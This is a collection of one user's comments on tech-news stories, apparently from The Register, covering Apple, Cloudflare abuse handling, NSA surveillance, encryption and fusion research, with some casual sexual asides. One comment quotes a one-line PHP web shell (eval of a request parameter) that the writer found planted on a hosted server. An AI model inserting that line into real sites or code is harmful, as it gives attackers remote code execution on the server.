* Posts by Franklin

571 posts • joined 17 May 2007

Wheels fall off bid to sue Apple over iTunes anti-piracy shenanigans

Franklin

Re: They're suing the wrong company

Yours is the first cogent description of the problem I've actually seen. I keep hearing about how "Apple wiped out non-iTunes music!!!111!1!" but I've had an iPod for quite some time and have never experienced this issue. I've never downloaded music from RealNetworks, either.

2
1

Hackers use DRAFT emails as dead-drops for running malware

Franklin

"Nothing stands out as a red flag and it’s difficult to detect because no footprints are left behind," said the company.

Shirley the draft emails themselves count as 'footprints,' no?

2
1

Big Retail's Apple Pay killer CurrentC HACKED, tester info nicked

Franklin

Re: Concerns

"The US transaction market has always seemed pretty "quaint" to much of the rest of the world."

Yeah. One of my girlfriends lives in Canada, and I feel like a barbarian when I visit her and pay for anything with my debit card. There's always this awkward moment when the cashier looks for the chip, then looks at me like "what is this primitive stone-knives-and-bearskins payment technology you've provided me with? How does this archaic thing even work, anyway?"

5
0

Franklin

Re: Concerns

"Pick the least evil one?"

Given the difficulty in gauging the relative evil of, say, Apple vs. Walmart vs. Google vs. any of the other players, I'd rather say "pick the more secure one."

Given that both the Apple and Google systems involve exchanging a single-use token that's necessary for the retailer to hook the cash out of my bank account, whereas (as I understand it, anyway) the CurrentC scheme allows the retailer direct access to my bank account, I know which of the two I prefer...

5
0

SHOW ME THE MONEY! Ballmer on Amazon: 'They're not a real biz, they make NO cash'

Franklin

"I'm proud of the fact that I made $250bn under my watch as CEO," says Ballmer, neglecting to add that under someone--anyone--else as CEO, Microsoft might have made rather a lot more.

23
2

We chat to CloudFlare about its 'EVERYBODY GETS SSL' venture

Franklin

Re: Cloudflare

Another benefit of Cloudflare is your IP address is obfuscated from spam trackers. That, plus Cloudflare's rather...relaxed attitudes toward spam and malware, make Cloudflare the content delivery platform of choice for really aggressive hardcore spammers and malware distributors.

I keep track of who's hosting/serving the spamvertised domains in all the spam I receive. Right now, Cloudflare's serving a bit over a third of the domains for all the spam landing on my spamtrap addresses.

2
0

Sway: Microsoft's new Office app doesn't have an Undo function

Franklin

Re: continuing the trend

That was my impression, too. It's like Hypercard, only juiced with cloudy Web 2.0 goodness. Whee!

0
0

Scientists skeptical of Lockheed Martin's truck-sized FUSION reactor breakthrough boast

Franklin

Re: 10 years

Despite the naysayers, fusion power has made considerable progress. It hasn't progressed as fast as we would like, but sometimes new technology works that way.

For example, Lawrence Livermore and MIT have both produced fusion reactions that net more energy output than energy input. They don't do it for long, but they do do it, which shows it is possible.

I for one would like to see more research put into fusion power. If and when it can be made to work, it's a civilization-wide game-changer. A lot of political, social, economic, and resource problems turn out to be power problems, when you have copious amounts of cheap power. (For instance, much of the developing world, and more recently the developed world, struggles with water shortages; cheap and plentiful power make desalination easy.)

It pains me that we as a species spend more money on spectator sports every year than we do on something that can profoundly change human civilization for the better.

81
1

NSA Sentry Eagle placed spies in private companies

Franklin

The NSA worked with "specific US commercial entities to modify US manufacturer encryption systems to make them exploitable for SIGINT". And yet, strangely, they didn't see how that might blow up in their faces.

The NSA is tasked both with protecting US network infrastructure and also penetrating and gathering intelligence from networks. Those two goals seem contradictory to me. I guess we've found out which of the two had the higher priority...

If someone ten years ago had written this into the plot of a sci-fi novel, I'd have thought it was too implausible. Live and learn.

4
1

'Encryption will make life very easy for criminals and terrorists'

Franklin

Re: Encryption and the Bad Guys

When the police say encryption makes it impossible for them to catch the bad guys, I read that as a stark admission of failure on their part. Essentially, they're saying they can't actually figure out how to catch criminals without the crims' help. Normal investigatory processes are useless; they can't catch bad guys unless they use stuff the bad guys themselves have written about their crimes.

1
0

BENDY iPhone 6, you say? Pah, warp claims are bent out of shape: Consumer Reports

Franklin

Re: Laboratory Street

"This lab test is brought to you by the words 'Apple' and 'Dollar', and by a very large number indeed."

You might want to do some research.

Consumers Union, the outfit behind Consumer Reports, refuses to accept money from any maker of any of the products they test. They will not even accept test samples from manufacturers--they buy everything they test retail. The magazine itself contains no advertising. They have shown themselves willing to go up against car manufacturers, pharmaceutical companies, and other wealthy, entrenched interests.

Complain about the test methodology if you like. Criticize the test apparatus if you like. But saying Apple bought them off just makes you look profoundly ignorant.

34
1

FBI boss: Apple's iPhone, iPad encryption puts people 'ABOVE THE LAW'

Franklin

"What I'm worried about is, this is an indication to us as a country and as a people that, boy, maybe that pendulum swung too far."

No. As long as metadata remains trivially easy to gobble in massive quantities without legal oversight, the pendulum has not swung too far. Just the opposite--it hasn't swung nearly far enough.

12
1

What the 4K: High-def DisplayPort vid meets reversible USB Type C

Franklin

"They had a problem with that, saying and they want people to understand that expensive cables are more profitable."

There. Fixed it for them.

16
0

CloudFlare ditches private SSL keys for better security

Franklin
Mushroom

Ironic to see this article posted on El Reg's home page so close to an article about the Home Depot hack, considering the credit cards swiped from Home Depot are now being sold on a carder site served up by Cloudflare (who have so far ignored several abuse reports on the matter).

0
0

I sold 10 MILLION iPhone 6es at the weekend, says Tim Cook. What did you do?

Franklin
Flame

Given the rising cost and diminishing returns of a university education, a person more cynical than I might suggest buying a phone is more rational than buying a degree. Not that I would suggest anything so cynical, oh goodness no.

4
0

Italy's High Court orders HP to refund punter for putting Windows on PC

Franklin

Re: What are Apple buyers going to do.

"But in both cases, non-free (as in beer) software has been bundled with the hardware, for which you can get no refund. I have explained the difference between the two situations above."

OS X is free. Indeed, OS X upgrades are free to users of earlier systems. So the cases don't match. You're not buying software you don't intend to use. (And you don't have to use OS X if you don't want to; I have a Mac Mini server running Linux. But I didn't pay extra for OS X when I bought it.)

0
0

Data entry REAR-END SNAFU: Weighty ballsup leads to plane take-off flap

Franklin

Re: Does it really matter who shot it down?

"It could be true, but I think it's a bit odd that military personnel capable of operating advanced defence electronics would be speaking in the open on insecure telephone lines, don't you?"

My father was career military. No, I don't find that one bit odd. Technically skilled specialists talking in the open on insecure telephone lines is *far* from surprising.

0
0

Drone captures shots of budding APPLE SPACESHIP HQ

Franklin

Re: Mic on drone

So I just got my first camera-equipped quadcopter, and on watching the video from my first test flight I was like "hey waitaminnit, there's no sound!" Then I thought about it for a second and realized why.

0
0

Comcast-Time Warner merger: CloudFlare's fare flare fair warning

Franklin

"Distributed web host CloudFlare says its costs rise dramatically..."

Don't let them hear you say the dreaded words "web host." Cloudflare serves up huge quantities of spam sites, malware, and phish sites...but its abuse team will quickly point out "we are not a Web host and therefore we will not/do not have to/cannot take any action against abuse on our network, now be off to bother someone else" if you file an abuse report.

5
1

Time to ditch HTTP – govt malware injection kit thrust into spotlight

Franklin

Re: Missing information

From the sound of it, the hacking device is simply a payload delivery system; it would be up to whoever is deploying it to equip it with the appropriate payload.

Attacks exist against both Mac OS and Windows targets by exploiting holes in Flash (the Mac DNSChanger malware is an example of an attack that targets Mac OS). Presumably, there are attack vectors against Linux as well, and I'm aware of at least one attack against old versions of Android that could presumably be loaded into this device.

4
1

Google leaves STUPID vuln on Nest devices

Franklin

Re: That's actually a feature I'd want

In a world where most people aren't developers, most people will always run someone else's code. "Run your own code" is fine for you and me, less so for my parents, my sister, my inlaws, and most of the other people who will be using these devices.

And I don't know about you, but I spend enough time doing friends'n'family tech support as it is. I don't want to be security-auditing or writing new firmware for every single new gadget they buy! I hardly have enough time to get things done as it is.

18
1

HTTP-Yes! Google boosts SSL-encrypted sites in search results

Franklin

Re: When I can self sign, and provide my CA by side channel (e.g. DNSSEC)

One of the advantages I see to this scheme is it makes black hat SEO bullsh*t just that little bit harder. The economics of linkfarming and SEO spamming mean even small incremental changes in cost have large knock-on effects that can undermine the profitability of the enterprise.

If we start accepting self-signed certs, then all that will happen is linkfarms will start using SSL with self-signed certs. And the consequences of accepting self-signed certs are potentially quite troublesome. I'm not down with making MITM attacks easier, for example.

Ideas like changing the color of the padlock for self-signed vs. CA-signed certs don't stand well in a world where it's hard enough to convince folks to look for the padlock in the first place. And unlike some IT-savvy people I've met, I don't believe that users who are less savvy deserve to get hijacked.

2
0

Surfing the web from Android? We KNEW it – sorry, iOS fanbois

Franklin

Re: RE: Fanbois and Apple's Cash Mountain

"What always confuses me is *why* any Apple fanboi thinks Apple's mountain of cash is *in any way* a good thing."

Back in the 90s, before His Jobsness returned to Apple, everyone who didn't like the company was saying "they're losing money, clearly that's a bad thing. Apple is doomed."

Now it's "they're making money, clearly that's a bad thing."

I use a lot of different machines--there are three Apple devices, two generic PC boxes running Linux, and a NAS on my desk as I type this. I make money from my machines, and I find that I use an Apple laptop a lot more than I use any of the other computers. That suggests to me the money I invested in this tool was worth it. :)

0
0

Unbridled BONKING and rampant ROGERING at YOUR office!

Franklin

"18 per cent revealed they have even checked their phone during sexual intercourse. Ah, that’ll be the women."

Nah, not necessarily. I once live-tweeted an orgy I was involved in. It seemed like a good idea at the time, though a well-known astronomer unfollowed me as a result. (Well, I assume it was as a result, given the timing, though correlation doesn't always imply causation, I've heard.)

0
0

14 antivirus apps found to have security problems

Franklin

Re: Point of Issue

"I can do dangerous things with a knife or chainsaw - that doesn't make them bad or dangerous when used in a responsible manner."

Sure. But plain old-fashioned C is a bit like a chainsaw with no chain guard. It's a capable tool, but you gotta watch where you put your hands...

Frankly, though, I think the responsibility lies with the AV vendors, not the tools they use. It's a poor workman who blames his tools. These folks are supposed to know about security, that's what they do.

1
0

Google to feed machines with evidence of human physical weaknesses – and that's a good thing

Franklin

"Electric toothbrushes. Discuss."

Rule 34, my friend. You can use an electric toothbrush applied to the...oh, never mind, just Google it.

Used to have a girlfriend who loooooved "abusing" her electric toothbrush this way...

1
0

Bose says today is F*** With Dre Day: Beats sued in patent battle

Franklin

So the company was founded in 2006, and for the last 8 years it's been operating without a peep from Bose. Then, in 2014, it gets bought by a company with very deep pockets, and Bose asserts its patent claims.

I'm sure the timing is entirely coincidental.

31
1

Major problems beset UK ISP filth filters: But it's OK, nobody uses them

Franklin

Re: TalkTalk blocked my site

I run and/or administer a large number of Web sites, on subjects ranging from computer troubleshooting to emerging biotechnology to sex.

Ironically, my personal site, which has no content that might be deemed even remotely scandalous (and is not a WordPress site), is blocked on Sky...but my sex site, which talks about kink in very explicit terms, is not blocked by any of the major UK ISPs.

Let's hear it for Net censors, getting things wrong since...well, since the dawn of time, I think.

0
0

Comcast bosses: THAT pushy sales rep was only obeying orders

Franklin

A great sales organization always listens to the customer, first and foremost. Comcast, on the other hand, has other policies.

20
0

New Star Wars movie plot details leak, violate common sense and laws of physics

Franklin

Re: El Reg... Really?

"Harrison Ford breaking his ankle (sounds more like a bad sprain, break one of your own and see), has no tech connection.

Some gossip site has no tech connection, except they have an Internet site."

Looking for a tech connection on every Reg article? You must be new.

As for the rogue stormtrooper: The idea of a hero with a conflicted past trying to make good can be brilliant, if it's done properly, but I have little faith this movie will be done properly.

I mean, Star Wars Episode 3 was basically the story of Faust--the classic story of the fall from grace that's been a running theme in human literature since...well, since before there WAS literature. It's an archetypal story that's so embedded in our consciousness that it should not be possible to screw it up. Yet screw it up they did. So I might, I think, be forgiven for approaching any new movies in the franchise with a certain battle-hardened skepticism, I think.

0
1

Manic malware Mayhem spreads through Linux, FreeBSD web servers

Franklin

Had a Web server (a shared hosting server operated by a big-name hosting provider) get hit by this recently. It dropped a PHP file onto the server that contained the line

<?php @eval(stripslashes($_REQUEST[ev]));

from which, as you can imagine, all manner of mayhem became possible.

1
0

Skiddies turn Amazon cloud into 'crime-as-a-service' – security bod

Franklin

"Companies that do see malicious activity originating from AWS should contact us immediately at ec2-abuse@amazon.com."

I've done this on many occasions, only to receive a "thank you for your report, we have confirmed an Amazon EC2 instance was running at the address you specified" form email in response...and days or weeks later, it's still there.

Perhaps the problem is I'm a person and not a company? If companies can be people, shirley people can be companies too?

0
0

Listen: WORST EVER customer service call – Comcast is 'very embarrassed'

Franklin

Re: Three

I had almost this same conversation a year back with Clear Wireless. I tried invoking the "may I speak to your supervisor" conjuration, but they were too clever for me--I got the exact same treatment from the supervisor[1]. Wish I'd have recorded it.

[1] At least she claimed to be a supervisor. I have no empirical evidence this was the case.

3
0

Child diagnosed as allergic to iPad

Franklin

Nickel allergies can be nasty. I once had a friend who discovered the hard way that the bright finish on a particular sex toy she liked had nickel in it...not a good scene. Aluminum-clad devices are, presumably, not likely to cause this particular problem.

5
0

Brit SPACE HEDGEHOG team flies student Mars payload

Franklin

"The next flight, "Elysium", is planned for October."

At which time it will no doubt be shot down by Jodie Foster.

0
0

That AMAZING Windows comeback: Wow – 0.5% growth in 2015

Franklin

Microsoft? Microsoft? That name sounds familiar. Wait, don't tell me, it will come to me...

7
0

Vid shows how to easily hack 'anti-spy' webmail (sorry, ProtonMail)

Franklin

Re: "Roth had notified them about the hole via Twitter"

I'm definitely more "security researcher" than "security professional," and on several occasions have notified firms of vulnerabilities and abuse by Twitter...when emails, phone calls, and other more orthodox channels of communication have been ignored.

Sometimes, public shaming works where reasonable discourse doesn't.

5
0

Fridge hacked. Car hacked. Next up, your LIGHT BULBS

Franklin

Re: Why is security still an afterthought?

In this particular case it doesn't seem like security was an afterthought--the mesh connections were encrypted, after all--but that the security wasn't implemented in a way that made it resistant to sophisticated physical attack on the microcontroller.

Security is HARD. Even when you think about it from the get-go.

2
0

Boeing to start work on most powerful rocket ... EVER!

Franklin

Re: Scary stuff...

It's an urban legend that the blueprints of the Saturn V and F1 engines disappeared after the end of the Apollo program. In fact, every scrap of engineering records was kept.

The issue with simply rebuilding F1s from the original design wasn't the lack of blueprints, but rather of skilled labor. The F1s required a fearsome number of extremely sophisticated hand welds made by master welders. Each one was slightly different from all the others, as engineers made small hand tweaks to each. (For example, early prototype F1 engines had a nasty habit of tearing themselves apart because the hot combustion gasses would start swirling in the combustion chamber, setting up shock waves that would build until the engine failed catastrophically. The engineers solved the problem by adding baffles to the injector head to prevent the gases from swirling, but, lacking tools to model the combustion and design the appropriate baffling, they simply experimented until they found designs that worked.)

It's the institutional knowledge, not the blueprints, that was lost.

10
0

It's alive! Space hackers fire up zombie Sun probe's engines

Franklin

Inspiring

I've talked to folks who seem to think crowdfunding is a fad that will never produce anything more exciting than a pot of potato salad. Projects like this show what's possible when a group of smart, dedicated, and determined folks, supported by a lot of people who believe what they're doing is worthwhile, attempt something amazing.

13
0

Today in IT news: iPad Fleshlight a reality

Franklin

Re: What's next ?

Did the same thing myself, many years ago, then got the idea to add a phono plug to it and write chat software that produced DTMF tones. Worked over the phone or the Internet.

First prototype used a simple, small switching transistor instead of a MOSFET, which promptly exploded the first time the toy turned on. (Who knew a simple battery-powered vibrator consumed six watts of power?)

More recently, I've connected an Arduino to a MOSFET and a Neurosky EEG chip, to make a vibe that works on brainwaves. Works really well, and it's even more hands-free than this iPad nonsense.

0
0

What's it like using the LG G smartwatch and Android Wear? Let us tell YOU

Franklin
Coat

Re: Want standalone, or at least wifi

"being able to read and reply to massages from anywhere in the house or garden without carrying my phone all the time is a genuine benefit."

I've always been able to reply to massages without a phone, myself.

Badum-bum.

0
0

Code Spaces goes titsup FOREVER after attacker NUKES its Amazon-hosted data

Franklin

I used to think that any data you store in "the cloud" exists on someone else's whim if you store it there for free.

Apparently it exists on someone else's whim if you pay to store it there, too.

14
1

SpaceX 'Dragon V2' ROCKET PODULE can hover-land on Earth - or MARS

Franklin

Re: It's empty!

Seems to me that nowadays that's the kind of task best suited to a computer, not a bloke with a joystick. If the computer fails you're kinda up the creek anyway; it's not like you're going to take manual control and pilot it down yourself.

0
0

Australia iOS ransom gizmo-snatch OUTRAGE not our FAULT: Apple

Franklin

Re: Other sites have statements ....

That thought occurred to me, too. If it were the result of a large-scale breach at $OTHER_PLACE, we would not likely see the exploits so localized.

It could even be the result of something as mundane and ho-hum as a phishing attack. Hell, I get phish emails asking me to "verify my Apple credentials" at least once a month.

A coordinated phish attack is less sexy than hackers trawling through troves of stolen eBay data and targeting people who reuse passwords, but it seems a bit more plausible to me.

0
0

That Snowden chap was SPOT ON says China

Franklin

Re: China beats up the US for spying

Though in this case, when Mr. Pot and Mr. Kettle go about doing their various dirty deeds, it's we who suffer for it. The fact that they're both in the wrong about this doesn't mean they aren't right about each other.

19
0

Apple, Beats and fools with money who trust celeb endorsements

Franklin
Joke

Re: I am sticking with Sennheiser and Walkman

"You will only get your hands on my Clement-Clarke Airlite-62s over my cold, dead body."

Your terms are acceptable.

4
0

Obama allows NSA to exploit 0-days: report

Franklin

You know what would be cool?

If the Federal government created a large, well-funded organization designed to safeguard the computer and communications infrastructure so vital to the nation's economy, perhaps by discovering flaws in commercially important cryptographic systems and...

Oh, wait.

5
0

Apple says iOS, OS X is immune to Heartbleed SSL bug

Franklin

Re: Apple is misleading

"For example, is Safari vulnerable? So if an Apple or Windows browser visits a malicious web site can data be stolen from the machine visiting the server. Heartbleed works on clients too."

If you're using a Web browser to browse to a secure site, the security of the connection depends on the version of SSL running server-side. If some banking site somewhere is vulnerable, that's not Apple's fault, seems to me.

Yes, anyone connecting to a vulnerable server is at risk. Apple hasn't said otherwise; what they said was "iOS and OS X never incorporated the vulnerable software and key Web-based services were not affected," which as near as I can tell seems to be true. (Mavericks, for instance, ships with OpenSSL 0.9.8y.)

0
0

Organic food: Pricey, not particularly healthy, won't save you from cancer

Franklin

Re: Luxury item

"The organic movement contains an awful lot of people who think organic=natural=Good whereas using modern pesticides in agriculture=unnatural=Poison, irrespective of the effects/evidence."

Indeed. And rather a lot of those folks don't know that organic food is often grown with pesticides, or if they do, assume for some bizarre reason that "natural" pesticides must be less poisonous than "synthetic" pesticides.

There's a wide range of pesticides used by "organic" growers, ranging from pyrethrins to copper sulfate. You really, really don't want to eat any of those pesticides--in many cases, they're more toxic than synthetics.

6
2
